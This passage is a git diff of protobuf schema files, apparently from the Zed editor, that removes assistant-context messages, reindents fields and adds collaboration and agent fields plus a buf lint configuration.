b/crates/proto/proto/ai.proto index b2a8a371c4422e80ad5edd677f2b75288f69ebd4..20c87d830a68c38c3682ff05d0fb5416099b17ff 100644 --- a/crates/proto/proto/ai.proto +++ b/crates/proto/proto/ai.proto @@ -1,249 +1,87 @@ syntax = "proto3"; package zed.messages; -import "buffer.proto"; import "task.proto"; -message Context { - repeated ContextOperation operations = 1; -} - -message ContextMetadata { - string context_id = 1; - optional string summary = 2; -} - -message ContextMessageStatus { - oneof variant { - Done done = 1; - Pending pending = 2; - Error error = 3; - Canceled canceled = 4; - } - - message Done {} - - message Pending {} - - message Error { - string message = 1; - } - - message Canceled {} -} - -message ContextMessage { - LamportTimestamp id = 1; - Anchor start = 2; - LanguageModelRole role = 3; - ContextMessageStatus status = 4; -} - -message SlashCommandOutputSection { - AnchorRange range = 1; - string icon_name = 2; - string label = 3; - optional string metadata = 4; -} - -message ThoughtProcessOutputSection { - AnchorRange range = 1; -} - -message ContextOperation { - oneof variant { - InsertMessage insert_message = 1; - UpdateMessage update_message = 2; - UpdateSummary update_summary = 3; - BufferOperation buffer_operation = 5; - SlashCommandStarted slash_command_started = 6; - SlashCommandOutputSectionAdded slash_command_output_section_added = 7; - SlashCommandCompleted slash_command_completed = 8; - ThoughtProcessOutputSectionAdded thought_process_output_section_added = 9; - } - - reserved 4; - - message InsertMessage { - ContextMessage message = 1; - repeated VectorClockEntry version = 2; - } - - message UpdateMessage { - LamportTimestamp message_id = 1; - LanguageModelRole role = 2; - ContextMessageStatus status = 3; - LamportTimestamp timestamp = 4; - repeated VectorClockEntry version = 5; - } - - message UpdateSummary { - string summary = 1; - bool done = 2; - LamportTimestamp timestamp = 3; - repeated VectorClockEntry version = 4; - } - - message SlashCommandStarted { - LamportTimestamp id = 1; - AnchorRange output_range = 2; - string name = 3; - repeated VectorClockEntry version = 4; - } - - message SlashCommandOutputSectionAdded { - LamportTimestamp timestamp = 1; - SlashCommandOutputSection section = 2; - repeated VectorClockEntry version = 3; - } - - message SlashCommandCompleted { - LamportTimestamp id = 1; - LamportTimestamp timestamp = 3; - optional string error_message = 4; - repeated VectorClockEntry version = 5; - } - - message ThoughtProcessOutputSectionAdded { - LamportTimestamp timestamp = 1; - ThoughtProcessOutputSection section = 2; - repeated VectorClockEntry version = 3; - } - - message BufferOperation { - Operation operation = 1; - } -} - -message AdvertiseContexts { - uint64 project_id = 1; - repeated ContextMetadata contexts = 2; -} - -message OpenContext { - uint64 project_id = 1; - string context_id = 2; -} - -message OpenContextResponse { - Context context = 1; -} - -message CreateContext { - uint64 project_id = 1; -} - -message CreateContextResponse { - string context_id = 1; - Context context = 2; -} - -message UpdateContext { - uint64 project_id = 1; - string context_id = 2; - ContextOperation operation = 3; -} - -message ContextVersion { - string context_id = 1; - repeated VectorClockEntry context_version = 2; - repeated VectorClockEntry buffer_version = 3; -} - -message SynchronizeContexts { - uint64 project_id = 1; - repeated ContextVersion contexts = 2; -} - -message SynchronizeContextsResponse { - repeated ContextVersion contexts = 1; -} - -enum LanguageModelRole { - LanguageModelUser = 0; - LanguageModelAssistant = 1; - LanguageModelSystem = 2; - reserved 3; -} - message GetAgentServerCommand { - uint64 project_id = 1; - string name = 2; - optional string root_dir = 3; + uint64 project_id = 1; + string name = 2; + optional string root_dir = 3; } message GetContextServerCommand { - uint64 project_id = 1; - string server_id = 2; - optional string root_dir = 3; + uint64 project_id = 1; + string server_id = 2; + optional string root_dir = 3; } message ContextServerCommand { - string path = 1; - repeated string args = 2; - map env = 3; + string path = 1; + repeated string args = 2; + map env = 3; } message AgentServerCommand { - string path = 1; - repeated string args = 2; - map env = 3; - string root_dir = 4; + string path = 1; + repeated string args = 2; + map env = 3; + string root_dir = 4; - optional SpawnInTerminal login = 5; + optional SpawnInTerminal login = 5; } message ExternalAgentsUpdated { - uint64 project_id = 1; - repeated string names = 2; + uint64 project_id = 1; + repeated string names = 2; } message ExternalExtensionAgentTarget { - string archive = 1; - string cmd = 2; - repeated string args = 3; - optional string sha256 = 4; - map env = 5; + string archive = 1; + string cmd = 2; + repeated string args = 3; + optional string sha256 = 4; + map env = 5; } message ExternalExtensionAgent { - string name = 1; - optional string icon_path = 2; - string extension_id = 3; - map targets = 4; - map env = 5; + string name = 1; + optional string icon_path = 2; + string extension_id = 3; + map targets = 4; + map env = 5; + optional string version = 6; } message ExternalExtensionAgentsUpdated { - uint64 project_id = 1; - repeated ExternalExtensionAgent agents = 2; + uint64 project_id = 1; + repeated ExternalExtensionAgent agents = 2; } message ExternalAgentLoadingStatusUpdated { - uint64 project_id = 1; - string name = 2; - string status = 3; + uint64 project_id = 1; + string name = 2; + reserved 3; } message NewExternalAgentVersionAvailable { - uint64 project_id = 1; - string name = 2; - string version = 3; + uint64 project_id = 1; + string name = 2; + string version = 3; } message ShareAgentThread { - string session_id = 1; // Client-generated UUID (acp::SessionId) - string title = 2; - bytes thread_data = 3; + string session_id = 1; // Client-generated UUID (acp::SessionId) + string title = 2; + bytes thread_data = 3; } message GetSharedAgentThread { - string session_id = 1; // UUID string + string session_id = 1; // UUID string } message GetSharedAgentThreadResponse { - string title = 1; - bytes thread_data = 2; - string sharer_username = 3; - string created_at = 4; + string title = 1; + bytes thread_data = 2; + string sharer_username = 3; + string created_at = 4; } diff --git a/crates/proto/proto/app.proto b/crates/proto/proto/app.proto index 3aa3b23a889228903e14755e90eecfa168702f0c..2ced6a16d4441c11c124b73115a41a9e7008843a 100644 --- a/crates/proto/proto/app.proto +++ b/crates/proto/proto/app.proto @@ -4,60 +4,59 @@ package zed.messages; message ShutdownRemoteServer {} message Toast { - uint64 project_id = 1; - string notification_id = 2; - string message = 3; + uint64 project_id = 1; + string notification_id = 2; + string message = 3; } message HideToast { - uint64 project_id = 1; - string notification_id = 2; + uint64 project_id = 1; + string notification_id = 2; } message OpenServerSettings { - uint64 project_id = 1; + uint64 project_id = 1; } -message GetCrashFiles { -} +message GetCrashFiles {} message GetCrashFilesResponse { - repeated CrashReport crashes = 1; - reserved 2; // old panics + repeated CrashReport crashes = 1; + reserved 2; // old panics } message CrashReport { - reserved 1, 2; - string metadata = 3; - bytes minidump_contents = 4; + reserved 1, 2; + string metadata = 3; + bytes minidump_contents = 4; } message Extension { - string id = 1; - string version = 2; - bool dev = 3; + string id = 1; + string version = 2; + bool dev = 3; } message SyncExtensions { - repeated Extension extensions = 1; + repeated Extension extensions = 1; } message SyncExtensionsResponse { - string tmp_dir = 1; - repeated Extension missing_extensions = 2; + string tmp_dir = 1; + repeated Extension missing_extensions = 2; } message InstallExtension { - Extension extension = 1; - string tmp_dir = 2; + Extension extension = 1; + string tmp_dir = 2; } message AskPassRequest { - uint64 project_id = 1; - reserved 2; - uint64 repository_id = 3; - uint64 askpass_id = 4; - string prompt = 5; + uint64 project_id = 1; + reserved 2; + uint64 repository_id = 3; + uint64 askpass_id = 4; + string prompt = 5; } message AskPassResponse { @@ -65,29 +64,29 @@ message AskPassResponse { } message GetRemoteProfilingData { - uint64 project_id = 1; - bool foreground_only = 2; + uint64 project_id = 1; + bool foreground_only = 2; } message GetRemoteProfilingDataResponse { - repeated RemoteProfilingThread threads = 1; - uint64 now_nanos = 2; + repeated RemoteProfilingThread threads = 1; + uint64 now_nanos = 2; } message RemoteProfilingThread { - optional string thread_name = 1; - uint64 thread_id = 2; - repeated RemoteProfilingTiming timings = 3; + optional string thread_name = 1; + uint64 thread_id = 2; + repeated RemoteProfilingTiming timings = 3; } message RemoteProfilingTiming { - RemoteProfilingLocation location = 1; - uint64 start_nanos = 2; - uint64 duration_nanos = 3; + RemoteProfilingLocation location = 1; + uint64 start_nanos = 2; + uint64 duration_nanos = 3; } message RemoteProfilingLocation { - string file = 1; - uint32 line = 2; - uint32 column = 3; + string file = 1; + uint32 line = 2; + uint32 column = 3; } diff --git a/crates/proto/proto/buf.yaml b/crates/proto/proto/buf.yaml index 93e819b2f771c2f2e3c032e6c50c0d126758ac19..37436d8d80f9435729d54da4326000be05b085f7 100644 --- a/crates/proto/proto/buf.yaml +++ b/crates/proto/proto/buf.yaml @@ -2,3 +2,13 @@ version: v1 breaking: use: - WIRE +lint: + except: + # Since we use post_build instead of buf this doesn't matter + - PACKAGE_DIRECTORY_MATCH + # This is internal to Zed only so we don't enforce versions + - PACKAGE_VERSION_SUFFIX + # Style rules we don't enforce + - ENUM_VALUE_PREFIX + - ENUM_VALUE_UPPER_SNAKE_CASE + - ENUM_ZERO_VALUE_SUFFIX diff --git a/crates/proto/proto/buffer.proto b/crates/proto/proto/buffer.proto index 4cd83af2aab8a44feb9f9646ec85d343b8875f82..69bd844ee743ef9038beb25b98b9b31ffb130b2c 100644 --- a/crates/proto/proto/buffer.proto +++ b/crates/proto/proto/buffer.proto @@ -5,313 +5,317 @@ import "core.proto"; import "worktree.proto"; message OpenNewBuffer { - uint64 project_id = 1; + uint64 project_id = 1; } message OpenBufferResponse { - uint64 buffer_id = 1; + uint64 buffer_id = 1; } message CreateBufferForPeer { - uint64 project_id = 1; - PeerId peer_id = 2; - oneof variant { - BufferState state = 3; - BufferChunk chunk = 4; - } + uint64 project_id = 1; + PeerId peer_id = 2; + oneof variant { + BufferState state = 3; + BufferChunk chunk = 4; + } } message UpdateBuffer { - uint64 project_id = 1; - uint64 buffer_id = 2; - repeated Operation operations = 3; + uint64 project_id = 1; + uint64 buffer_id = 2; + repeated Operation operations = 3; } message OpenBufferByPath { - uint64 project_id = 1; - uint64 worktree_id = 2; - string path = 3; + uint64 project_id = 1; + uint64 worktree_id = 2; + string path = 3; } message OpenBufferById { - uint64 project_id = 1; - uint64 id = 2; + uint64 project_id = 1; + uint64 id = 2; } message UpdateBufferFile { - uint64 project_id = 1; - uint64 buffer_id = 2; - File file = 3; + uint64 project_id = 1; + uint64 buffer_id = 2; + File file = 3; } message SaveBuffer { - uint64 project_id = 1; - uint64 buffer_id = 2; - repeated VectorClockEntry version = 3; - optional ProjectPath new_path = 4; + uint64 project_id = 1; + uint64 buffer_id = 2; + repeated VectorClockEntry version = 3; + optional ProjectPath new_path = 4; } message CloseBuffer { - uint64 project_id = 1; - uint64 buffer_id = 2; + uint64 project_id = 1; + uint64 buffer_id = 2; } message BufferSaved { - uint64 project_id = 1; - uint64 buffer_id = 2; - repeated VectorClockEntry version = 3; - Timestamp mtime = 4; - reserved 5; + uint64 project_id = 1; + uint64 buffer_id = 2; + repeated VectorClockEntry version = 3; + Timestamp mtime = 4; + reserved 5; } message BufferReloaded { - uint64 project_id = 1; - uint64 buffer_id = 2; - repeated VectorClockEntry version = 3; - Timestamp mtime = 4; - reserved 5; - LineEnding line_ending = 6; + uint64 project_id = 1; + uint64 buffer_id = 2; + repeated VectorClockEntry version = 3; + Timestamp mtime = 4; + reserved 5; + LineEnding line_ending = 6; } message ReloadBuffers { - uint64 project_id = 1; - repeated uint64 buffer_ids = 2; + uint64 project_id = 1; + repeated uint64 buffer_ids = 2; } message ReloadBuffersResponse { - ProjectTransaction transaction = 1; + ProjectTransaction transaction = 1; } message SynchronizeBuffers { - uint64 project_id = 1; - repeated BufferVersion buffers = 2; + uint64 project_id = 1; + repeated BufferVersion buffers = 2; } message SynchronizeBuffersResponse { - repeated BufferVersion buffers = 1; + repeated BufferVersion buffers = 1; } message BufferVersion { - uint64 id = 1; - repeated VectorClockEntry version = 2; + uint64 id = 1; + repeated VectorClockEntry version = 2; } message BufferState { - uint64 id = 1; - optional File file = 2; - string base_text = 3; - LineEnding line_ending = 5; - repeated VectorClockEntry saved_version = 6; - Timestamp saved_mtime = 8; + uint64 id = 1; + optional File file = 2; + string base_text = 3; + LineEnding line_ending = 5; + repeated VectorClockEntry saved_version = 6; + Timestamp saved_mtime = 8; - reserved 7; - reserved 4; + reserved 7; + reserved 4; } message BufferChunk { - uint64 buffer_id = 1; - repeated Operation operations = 2; - bool is_last = 3; + uint64 buffer_id = 1; + repeated Operation operations = 2; + bool is_last = 3; } enum LineEnding { - Unix = 0; - Windows = 1; + Unix = 0; + Windows = 1; } message VectorClockEntry { - uint32 replica_id = 1; - uint32 timestamp = 2; + uint32 replica_id = 1; + uint32 timestamp = 2; } message UndoMapEntry { - uint32 replica_id = 1; - uint32 local_timestamp = 2; - repeated UndoCount counts = 3; + uint32 replica_id = 1; + uint32 local_timestamp = 2; + repeated UndoCount counts = 3; } message UndoCount { - uint32 replica_id = 1; - uint32 lamport_timestamp = 2; - uint32 count = 3; + uint32 replica_id = 1; + uint32 lamport_timestamp = 2; + uint32 count = 3; } message Operation { - oneof variant { - Edit edit = 1; - Undo undo = 2; - UpdateSelections update_selections = 3; - UpdateDiagnostics update_diagnostics = 4; - UpdateCompletionTriggers update_completion_triggers = 5; - UpdateLineEnding update_line_ending = 6; - } - - message Edit { - uint32 replica_id = 1; - uint32 lamport_timestamp = 2; - repeated VectorClockEntry version = 3; - repeated Range ranges = 4; - repeated string new_text = 5; - } - - message Undo { - uint32 replica_id = 1; - uint32 lamport_timestamp = 2; - repeated VectorClockEntry version = 3; - repeated UndoCount counts = 4; - } - - message UpdateSelections { - uint32 replica_id = 1; - uint32 lamport_timestamp = 2; - repeated Selection selections = 3; - bool line_mode = 4; - CursorShape cursor_shape = 5; - } - - message UpdateCompletionTriggers { - uint32 replica_id = 1; - uint32 lamport_timestamp = 2; - repeated string triggers = 3; - uint64 language_server_id = 4; - } - - message UpdateLineEnding { - uint32 replica_id = 1; - uint32 lamport_timestamp = 2; - LineEnding line_ending = 3; - } + oneof variant { + Edit edit = 1; + Undo undo = 2; + UpdateSelections update_selections = 3; + UpdateDiagnostics update_diagnostics = 4; + UpdateCompletionTriggers update_completion_triggers = 5; + UpdateLineEnding update_line_ending = 6; + } + + message Edit { + uint32 replica_id = 1; + uint32 lamport_timestamp = 2; + repeated VectorClockEntry version = 3; + repeated Range ranges = 4; + repeated string new_text = 5; + } + + message Undo { + uint32 replica_id = 1; + uint32 lamport_timestamp = 2; + repeated VectorClockEntry version = 3; + repeated UndoCount counts = 4; + } + + message UpdateSelections { + uint32 replica_id = 1; + uint32 lamport_timestamp = 2; + repeated Selection selections = 3; + bool line_mode = 4; + CursorShape cursor_shape = 5; + } + + message UpdateCompletionTriggers { + uint32 replica_id = 1; + uint32 lamport_timestamp = 2; + repeated string triggers = 3; + uint64 language_server_id = 4; + } + + message UpdateLineEnding { + uint32 replica_id = 1; + uint32 lamport_timestamp = 2; + LineEnding line_ending = 3; + } } message ProjectTransaction { - repeated uint64 buffer_ids = 1; - repeated Transaction transactions = 2; + repeated uint64 buffer_ids = 1; + repeated Transaction transactions = 2; } message Transaction { - LamportTimestamp id = 1; - repeated LamportTimestamp edit_ids = 2; - repeated VectorClockEntry start = 3; + LamportTimestamp id = 1; + repeated LamportTimestamp edit_ids = 2; + repeated VectorClockEntry start = 3; } message LamportTimestamp { - uint32 replica_id = 1; - uint32 value = 2; + uint32 replica_id = 1; + uint32 value = 2; } message Range { - uint64 start = 1; - uint64 end = 2; + uint64 start = 1; + uint64 end = 2; } message Selection { - uint64 id = 1; - EditorAnchor start = 2; - EditorAnchor end = 3; - bool reversed = 4; + uint64 id = 1; + EditorAnchor start = 2; + EditorAnchor end = 3; + bool reversed = 4; } message EditorAnchor { - uint64 excerpt_id = 1; - Anchor anchor = 2; + optional uint64 excerpt_id = 1; + Anchor anchor = 2; +} + +message PathKey { + optional uint64 sort_prefix = 1; + string path = 2; } enum CursorShape { - CursorBar = 0; - CursorBlock = 1; - CursorUnderscore = 2; - CursorHollow = 3; + CursorBar = 0; + CursorBlock = 1; + CursorUnderscore = 2; + CursorHollow = 3; } message UpdateDiagnostics { - uint32 replica_id = 1; - uint32 lamport_timestamp = 2; - uint64 server_id = 3; - repeated Diagnostic diagnostics = 4; + uint32 replica_id = 1; + uint32 lamport_timestamp = 2; + uint64 server_id = 3; + repeated Diagnostic diagnostics = 4; } message Anchor { - uint32 replica_id = 1; - uint32 timestamp = 2; - uint64 offset = 3; - Bias bias = 4; - optional uint64 buffer_id = 5; + uint32 replica_id = 1; + uint32 timestamp = 2; + uint64 offset = 3; + Bias bias = 4; + optional uint64 buffer_id = 5; } message AnchorRange { - Anchor start = 1; - Anchor end = 2; + Anchor start = 1; + Anchor end = 2; } message Location { - uint64 buffer_id = 1; - Anchor start = 2; - Anchor end = 3; + uint64 buffer_id = 1; + Anchor start = 2; + Anchor end = 3; } enum Bias { - Left = 0; - Right = 1; + Left = 0; + Right = 1; } message Diagnostic { - Anchor start = 1; - Anchor end = 2; - optional string source = 3; - optional string registration_id = 17; - - enum SourceKind { - Pulled = 0; - Pushed = 1; - Other = 2; - } - - SourceKind source_kind = 16; - Severity severity = 4; - string message = 5; - optional string code = 6; - uint64 group_id = 7; - bool is_primary = 8; - - reserved 9; - - bool is_disk_based = 10; - bool is_unnecessary = 11; - bool underline = 15; - - enum Severity { - None = 0; - Error = 1; - Warning = 2; - Information = 3; - Hint = 4; - } - optional string data = 12; - optional string code_description = 13; - optional string markdown = 14; + Anchor start = 1; + Anchor end = 2; + optional string source = 3; + optional string registration_id = 17; + + enum SourceKind { + Pulled = 0; + Pushed = 1; + Other = 2; + } + + SourceKind source_kind = 16; + Severity severity = 4; + string message = 5; + optional string code = 6; + uint64 group_id = 7; + bool is_primary = 8; + + reserved 9; + + bool is_disk_based = 10; + bool is_unnecessary = 11; + bool underline = 15; + + enum Severity { + None = 0; + Error = 1; + Warning = 2; + Information = 3; + Hint = 4; + } + optional string data = 12; + optional string code_description = 13; + optional string markdown = 14; } message SearchQuery { - string query = 2; - bool regex = 3; - bool whole_word = 4; - bool case_sensitive = 5; - repeated string files_to_include = 10; - repeated string files_to_exclude = 11; - bool match_full_paths = 9; - bool include_ignored = 8; - string files_to_include_legacy = 6; - string files_to_exclude_legacy = 7; + string query = 2; + bool regex = 3; + bool whole_word = 4; + bool case_sensitive = 5; + repeated string files_to_include = 10; + repeated string files_to_exclude = 11; + bool match_full_paths = 9; + bool include_ignored = 8; + string files_to_include_legacy = 6; + string files_to_exclude_legacy = 7; } message FindSearchCandidates { - uint64 project_id = 1; - SearchQuery query = 2; - uint64 limit = 3; - uint64 handle = 4; + uint64 project_id = 1; + SearchQuery query = 2; + uint64 limit = 3; + uint64 handle = 4; } - message FindSearchCandidatesDone {} message FindSearchCandidatesMatches { @@ -330,6 +334,6 @@ message FindSearchCandidatesChunk { } message FindSearchCandidatesCancelled { - uint64 project_id = 1; - uint64 handle = 2; + uint64 project_id = 1; + uint64 handle = 2; } diff --git a/crates/proto/proto/call.proto b/crates/proto/proto/call.proto index a7fe607bb5aaaff53518652186f46bcb6529e661..71351fb74c5834fe0b1650f22e851c21cd752466 100644 --- a/crates/proto/proto/call.proto +++ b/crates/proto/proto/call.proto @@ -1,424 +1,440 @@ syntax = "proto3"; package zed.messages; -import "core.proto"; -import "worktree.proto"; import "buffer.proto"; -import "lsp.proto"; import "channel.proto"; +import "core.proto"; import "git.proto"; +import "lsp.proto"; +import "worktree.proto"; message CreateRoom {} message CreateRoomResponse { - Room room = 1; - optional LiveKitConnectionInfo live_kit_connection_info = 2; + Room room = 1; + optional LiveKitConnectionInfo live_kit_connection_info = 2; } message JoinRoom { - uint64 id = 1; + uint64 id = 1; } message JoinRoomResponse { - Room room = 1; - optional uint64 channel_id = 2; - optional LiveKitConnectionInfo live_kit_connection_info = 3; + Room room = 1; + optional uint64 channel_id = 2; + optional LiveKitConnectionInfo live_kit_connection_info = 3; } message RejoinRoom { - uint64 id = 1; - repeated UpdateProject reshared_projects = 2; - repeated RejoinProject rejoined_projects = 3; + uint64 id = 1; + repeated UpdateProject reshared_projects = 2; + repeated RejoinProject rejoined_projects = 3; } message RejoinRemoteProjects { - repeated RejoinProject rejoined_projects = 1; + repeated RejoinProject rejoined_projects = 1; } message RejoinRemoteProjectsResponse { - repeated RejoinedProject rejoined_projects = 1; + repeated RejoinedProject rejoined_projects = 1; } message RejoinProject { - uint64 id = 1; - repeated RejoinWorktree worktrees = 2; - repeated RejoinRepository repositories = 3; + uint64 id = 1; + repeated RejoinWorktree worktrees = 2; + repeated RejoinRepository repositories = 3; } message RejoinWorktree { - uint64 id = 1; - uint64 scan_id = 2; + uint64 id = 1; + uint64 scan_id = 2; } message RejoinRepository { - uint64 id = 1; - uint64 scan_id = 2; + uint64 id = 1; + uint64 scan_id = 2; } message RejoinRoomResponse { - Room room = 1; - repeated ResharedProject reshared_projects = 2; - repeated RejoinedProject rejoined_projects = 3; + Room room = 1; + repeated ResharedProject reshared_projects = 2; + repeated RejoinedProject rejoined_projects = 3; } message ResharedProject { - uint64 id = 1; - repeated Collaborator collaborators = 2; + uint64 id = 1; + repeated Collaborator collaborators = 2; } message RejoinedProject { - uint64 id = 1; - repeated WorktreeMetadata worktrees = 2; - repeated Collaborator collaborators = 3; - repeated LanguageServer language_servers = 4; - repeated string language_server_capabilities = 5; + uint64 id = 1; + repeated WorktreeMetadata worktrees = 2; + repeated Collaborator collaborators = 3; + repeated LanguageServer language_servers = 4; + repeated string language_server_capabilities = 5; } message LeaveRoom {} message Room { - uint64 id = 1; - repeated Participant participants = 2; - repeated PendingParticipant pending_participants = 3; - repeated Follower followers = 4; - string livekit_room = 5; + uint64 id = 1; + repeated Participant participants = 2; + repeated PendingParticipant pending_participants = 3; + repeated Follower followers = 4; + string livekit_room = 5; } message Participant { - uint64 user_id = 1; - PeerId peer_id = 2; - repeated ParticipantProject projects = 3; - ParticipantLocation location = 4; - uint32 participant_index = 5; - ChannelRole role = 6; - reserved 7; + uint64 user_id = 1; + PeerId peer_id = 2; + repeated ParticipantProject projects = 3; + ParticipantLocation location = 4; + uint32 participant_index = 5; + ChannelRole role = 6; + reserved 7; } message PendingParticipant { - uint64 user_id = 1; - uint64 calling_user_id = 2; - optional uint64 initial_project_id = 3; + uint64 user_id = 1; + uint64 calling_user_id = 2; + optional uint64 initial_project_id = 3; } message ParticipantProject { - uint64 id = 1; - repeated string worktree_root_names = 2; + uint64 id = 1; + repeated string worktree_root_names = 2; } message Follower { - PeerId leader_id = 1; - PeerId follower_id = 2; - uint64 project_id = 3; + PeerId leader_id = 1; + PeerId follower_id = 2; + uint64 project_id = 3; } message ParticipantLocation { - oneof variant { - SharedProject shared_project = 1; - UnsharedProject unshared_project = 2; - External external = 3; - } + oneof variant { + SharedProject shared_project = 1; + UnsharedProject unshared_project = 2; + External external = 3; + } - message SharedProject { - uint64 id = 1; - } + message SharedProject { + uint64 id = 1; + } - message UnsharedProject {} + message UnsharedProject {} - message External {} + message External {} } message Call { - uint64 room_id = 1; - uint64 called_user_id = 2; - optional uint64 initial_project_id = 3; + uint64 room_id = 1; + uint64 called_user_id = 2; + optional uint64 initial_project_id = 3; } message IncomingCall { - uint64 room_id = 1; - uint64 calling_user_id = 2; - repeated uint64 participant_user_ids = 3; - optional ParticipantProject initial_project = 4; + uint64 room_id = 1; + uint64 calling_user_id = 2; + repeated uint64 participant_user_ids = 3; + optional ParticipantProject initial_project = 4; } message CallCanceled { - uint64 room_id = 1; + uint64 room_id = 1; } message CancelCall { - uint64 room_id = 1; - uint64 called_user_id = 2; + uint64 room_id = 1; + uint64 called_user_id = 2; } message DeclineCall { - uint64 room_id = 1; + uint64 room_id = 1; } message UpdateParticipantLocation { - uint64 room_id = 1; - ParticipantLocation location = 2; + uint64 room_id = 1; + ParticipantLocation location = 2; } message RoomUpdated { - Room room = 1; + Room room = 1; } message LiveKitConnectionInfo { - string server_url = 1; - string token = 2; - bool can_publish = 3; + string server_url = 1; + string token = 2; + bool can_publish = 3; } message ShareProject { - uint64 room_id = 1; - repeated WorktreeMetadata worktrees = 2; - reserved 3; - bool is_ssh_project = 4; - optional bool windows_paths = 5; + uint64 room_id = 1; + repeated WorktreeMetadata worktrees = 2; + reserved 3; + bool is_ssh_project = 4; + optional bool windows_paths = 5; + repeated string features = 6; } message ShareProjectResponse { - uint64 project_id = 1; + uint64 project_id = 1; } message UnshareProject { - uint64 project_id = 1; + uint64 project_id = 1; } message UpdateProject { - uint64 project_id = 1; - repeated WorktreeMetadata worktrees = 2; + uint64 project_id = 1; + repeated WorktreeMetadata worktrees = 2; } message JoinProject { - uint64 project_id = 1; - optional string committer_email = 2; - optional string committer_name = 3; + uint64 project_id = 1; + optional string committer_email = 2; + optional string committer_name = 3; + repeated string features = 4; } message JoinProjectResponse { - uint64 project_id = 5; - uint32 replica_id = 1; - repeated WorktreeMetadata worktrees = 2; - repeated Collaborator collaborators = 3; - repeated LanguageServer language_servers = 4; - repeated string language_server_capabilities = 8; - ChannelRole role = 6; - bool windows_paths = 9; - reserved 7; + uint64 project_id = 5; + uint32 replica_id = 1; + repeated WorktreeMetadata worktrees = 2; + repeated Collaborator collaborators = 3; + repeated LanguageServer language_servers = 4; + repeated string language_server_capabilities = 8; + ChannelRole role = 6; + bool windows_paths = 9; + repeated string features = 10; + reserved 7; } message LeaveProject { - uint64 project_id = 1; + uint64 project_id = 1; } message UpdateWorktree { - uint64 project_id = 1; - uint64 worktree_id = 2; - string root_name = 3; - repeated Entry updated_entries = 4; - repeated uint64 removed_entries = 5; - repeated RepositoryEntry updated_repositories = 6; // deprecated - repeated uint64 removed_repositories = 7; // deprecated - uint64 scan_id = 8; - bool is_last_update = 9; - string abs_path = 10; + uint64 project_id = 1; + uint64 worktree_id = 2; + string root_name = 3; + repeated Entry updated_entries = 4; + repeated uint64 removed_entries = 5; + repeated RepositoryEntry updated_repositories = 6; // deprecated + repeated uint64 removed_repositories = 7; // deprecated + uint64 scan_id = 8; + bool is_last_update = 9; + string abs_path = 10; + optional string root_repo_common_dir = 11; } // deprecated message RepositoryEntry { - uint64 repository_id = 1; - reserved 2; - repeated StatusEntry updated_statuses = 3; - repeated string removed_statuses = 4; - repeated string current_merge_conflicts = 5; - optional Branch branch_summary = 6; + uint64 repository_id = 1; + reserved 2; + repeated StatusEntry updated_statuses = 3; + repeated string removed_statuses = 4; + repeated string current_merge_conflicts = 5; + optional Branch branch_summary = 6; } message AddProjectCollaborator { - uint64 project_id = 1; - Collaborator collaborator = 2; + uint64 project_id = 1; + Collaborator collaborator = 2; } message UpdateProjectCollaborator { - uint64 project_id = 1; - PeerId old_peer_id = 2; - PeerId new_peer_id = 3; + uint64 project_id = 1; + PeerId old_peer_id = 2; + PeerId new_peer_id = 3; } message RemoveProjectCollaborator { - uint64 project_id = 1; - PeerId peer_id = 2; + uint64 project_id = 1; + PeerId peer_id = 2; } message GetUsers { - repeated uint64 user_ids = 1; + repeated uint64 user_ids = 1; } message FuzzySearchUsers { - string query = 1; + string query = 1; } message UsersResponse { - repeated User users = 1; + repeated User users = 1; } message RequestContact { - uint64 responder_id = 1; + uint64 responder_id = 1; } message RemoveContact { - uint64 user_id = 1; + uint64 user_id = 1; } message RespondToContactRequest { - uint64 requester_id = 1; - ContactRequestResponse response = 2; + uint64 requester_id = 1; + ContactRequestResponse response = 2; } enum ContactRequestResponse { - Accept = 0; - Decline = 1; - Block = 2; - Dismiss = 3; + Accept = 0; + Decline = 1; + Block = 2; + Dismiss = 3; } message UpdateContacts { - repeated Contact contacts = 1; - repeated uint64 remove_contacts = 2; - repeated IncomingContactRequest incoming_requests = 3; - repeated uint64 remove_incoming_requests = 4; - repeated uint64 outgoing_requests = 5; - repeated uint64 remove_outgoing_requests = 6; + repeated Contact contacts = 1; + repeated uint64 remove_contacts = 2; + repeated IncomingContactRequest incoming_requests = 3; + repeated uint64 remove_incoming_requests = 4; + repeated uint64 outgoing_requests = 5; + repeated uint64 remove_outgoing_requests = 6; } message ShowContacts {} message IncomingContactRequest { - uint64 requester_id = 1; + uint64 requester_id = 1; } message Follow { - uint64 room_id = 1; - optional uint64 project_id = 2; - PeerId leader_id = 3; + uint64 room_id = 1; + optional uint64 project_id = 2; + PeerId leader_id = 3; } message FollowResponse { - View active_view = 3; - reserved 1; - repeated View views = 2; + View active_view = 3; + reserved 1; + repeated View views = 2; } message UpdateFollowers { - uint64 room_id = 1; - optional uint64 project_id = 2; - reserved 3; - oneof variant { - View create_view = 5; - UpdateActiveView update_active_view = 4; - UpdateView update_view = 6; - } + uint64 room_id = 1; + optional uint64 project_id = 2; + reserved 3; + oneof variant { + View create_view = 5; + UpdateActiveView update_active_view = 4; + UpdateView update_view = 6; + } } message Unfollow { - uint64 room_id = 1; - optional uint64 project_id = 2; - PeerId leader_id = 3; + uint64 room_id = 1; + optional uint64 project_id = 2; + PeerId leader_id = 3; } message ViewId { - PeerId creator = 1; - uint64 id = 2; + PeerId creator = 1; + uint64 id = 2; } message UpdateActiveView { - reserved 1, 2; - View view = 3; + reserved 1, 2; + View view = 3; } enum PanelId { - AssistantPanel = 0; - DebugPanel = 1; + AssistantPanel = 0; + DebugPanel = 1; } message UpdateView { - ViewId id = 1; - optional PeerId leader_id = 2; - - oneof variant { - Editor editor = 3; - } - - message Editor { - repeated ExcerptInsertion inserted_excerpts = 1; - repeated uint64 deleted_excerpts = 2; - repeated Selection selections = 3; - optional Selection pending_selection = 4; - EditorAnchor scroll_top_anchor = 5; - reserved 6; - reserved 7; - double scroll_x = 8; - double scroll_y = 9; - } + ViewId id = 1; + optional PeerId leader_id = 2; + + oneof variant { + Editor editor = 3; + } + + message Editor { + repeated ExcerptInsertion inserted_excerpts = 1; + repeated uint64 deleted_excerpts = 2; + repeated Selection selections = 3; + optional Selection pending_selection = 4; + EditorAnchor scroll_top_anchor = 5; + reserved 6; + reserved 7; + double scroll_x = 8; + double scroll_y = 9; + repeated PathExcerpts updated_paths = 10; + repeated uint64 deleted_buffers = 11; + } } message View { - ViewId id = 1; - optional PeerId leader_id = 2; - optional PanelId panel_id = 6; - - oneof variant { - Editor editor = 3; - ChannelView channel_view = 4; - ContextEditor context_editor = 5; - } - - message Editor { - bool singleton = 1; - optional string title = 2; - repeated Excerpt 